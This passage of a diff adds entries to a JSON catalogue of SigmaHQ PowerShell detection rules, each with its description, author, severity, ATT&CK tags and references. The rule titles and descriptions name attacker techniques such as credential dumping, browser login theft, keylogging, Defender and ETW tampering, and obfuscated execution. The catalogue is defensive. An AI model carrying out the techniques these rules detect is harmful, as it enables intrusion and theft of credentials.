"Unknown" + ], + "filename": "posh_ps_file_and_directory_discovery.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", + "value": "Powershell File and Directory Discovery" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule)", + "creation_date": "2017/03/12", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "filename": "posh_ps_susp_invocation_generic.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ed965133-513f-41d9-a441-e38076a0798f", + "value": "Suspicious PowerShell Invocations - Generic" + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "creation_date": "2020/10/05", + "falsepositive": [ + "App-V clients" + ], + "filename": "posh_ps_syncappvpublishingserver_exe.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_automated_collection.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ] + }, + "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "value": "Automated Collection Command PowerShell" + }, + { + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_windows_firewall_profile_disabled.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "http://woshub.com/manage-windows-firewall-powershell/", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", + "value": "Windows Firewall Profile Disabled" + }, + { + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_directoryservices_accountmanagement.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.002" + ] + }, + "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "value": "Manipulation of User Computer or Group Security Principals Across AD" + }, + { + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "meta": { + "author": "Ali Alwashali", + "creation_date": "2022/08/21", + "falsepositive": [ + "Legitimate script that disables the command history" + ], + "filename": "posh_ps_disable_psreadline_command_history.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/DissectMalware/status/1062879286749773824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", + "value": "Disable Powershell Command History" + }, + { + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_keylogging.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" + ], + "tags": [ + "attack.collection", + "attack.t1056.001" + ] + }, + "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", + "value": "Powershell Keylogging" + }, + { + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/30", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_access_to_browser_login_data.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ] + }, + "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", + "value": "Access to Browser Login Data" + }, + { + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_mailboxexport_share.yml", + "level": "critical", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "value": "Suspicious PowerShell Mailbox Export to Share - PS" + }, + { + "description": "Detects powershell scripts that import modules from suspicious directories", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_import_module_susp_dirs.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", + "value": "Import PowerShell Modules From Suspicious Directories" + }, + { + "description": "Detect adversaries enumerate sensitive files", + "meta": { + "author": "frack113", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_sensitive_file_discovery.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1570814999370801158", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", + "value": "Powershell Sensitive File Discovery" + }, + { + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_dump_password_windows_credential_manager.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ] + }, + "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "value": "Dump Credentials from Windows Credential Manager With PowerShell" + }, + { + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_susp_ssl_keyword.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "value": "Suspicious SSL Connection" + }, + { + "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", + "meta": { + "author": "frack113", + "creation_date": "2022/12/25", + "falsepositive": [ + "Legitimate use of the library" + ], + "filename": "posh_ps_dotnet_assembly_from_file.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml" + ], + "tags": "No established tags" + }, + "uuid": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "value": "Potential In-Memory Execution Using Reflection.Assembly" + }, + { + "description": "Detecting use WinAPI Functions in PowerShell", + "meta": { + "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "creation_date": "2020/10/06", + "falsepositive": [ + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + ], + "filename": "posh_ps_accessing_win_api.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1106" + ] + }, + "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", + "value": "Accessing WinAPI in PowerShell" + }, + { + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/06", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_get_adreplaccount.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", + "https://www.powershellgallery.com/packages/DSInternals", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ] + }, + "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "value": "Suspicious Get-ADReplAccount" + }, + { + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_etw_trace_evasion.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" + ] + }, + "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "value": "Disable of ETW Trace - Powershell" + }, + { + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "meta": { + "author": "frack113", + "creation_date": "2021/10/20", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_ps_set_policies_to_unsecure_level.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "value": "Change PowerShell Policies to an Insecure Level - PowerShell" + }, + { + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "meta": { + "author": "frack113", + "creation_date": "2022/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_directorysearcher.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "value": "DirectorySearcher Powershell Exploitation" + }, + { + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_unblock_file.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", + "value": "Suspicious Unblock-File" + }, + { + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/23", + "falsepositive": [ + "Admin script" + ], + "filename": "posh_ps_susp_win32_pnpentity.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ] + }, + "uuid": "b26647de-4feb-4283-af6b-6117661283c5", + "value": "Powershell Suspicious Win32_PnPEntity" + }, + { + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ] + }, + "uuid": "603c6630-5225-49c1-8047-26c964553e0e", + "value": "Enumerate Credentials from Windows Credential Manager With PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2019/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell" + }, + { + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_disable_windowsoptionalfeature.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "value": "Disable-WindowsOptionalFeature Command PowerShell" + }, + { + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_trigger_profiles.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.013" + ] + }, + "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", + "value": "Powershell Trigger Profiles by Add_Content" + }, + { + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_tamper_defender_remove_mppreference.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging" + }, + { + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Legitimate administration script" + ], + "filename": "posh_ps_susp_execute_batch_script.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", + "value": "Powershell Execute Batch Script" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell" + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate use" + ], + "filename": "posh_ps_modify_group_policy_settings.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" + ] + }, + "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "value": "Modify Group Policy Settings - ScriptBlockLogging" + }, + { + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", + "meta": { + "author": "frack113", + "creation_date": "2021/09/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_store_file_in_alternate_data_stream.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "value": "Powershell Store File In Alternate Data Stream" + }, + { + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_capture_screenshots.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", + "value": "Windows Screen Capture with CopyFromScreen" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_ps_susp_download.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", + "value": "Suspicious PowerShell Download - Powershell Script" + }, + { + "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_remove_item_path.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", + "value": "Use Remove-Item to Delete File" + }, + { + "description": "Detects PowerShell calling a credential prompt", + "meta": { + "author": "John Lambert (idea), Florian Roth (rule)", + "creation_date": "2017/04/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_prompt_credentials.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://t.co/ezOTGy1a1G", + "https://twitter.com/JohnLaTwC/status/850381440629981184", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "value": "PowerShell Credential Prompt" + }, + { + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_invoke_command_remote.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" + 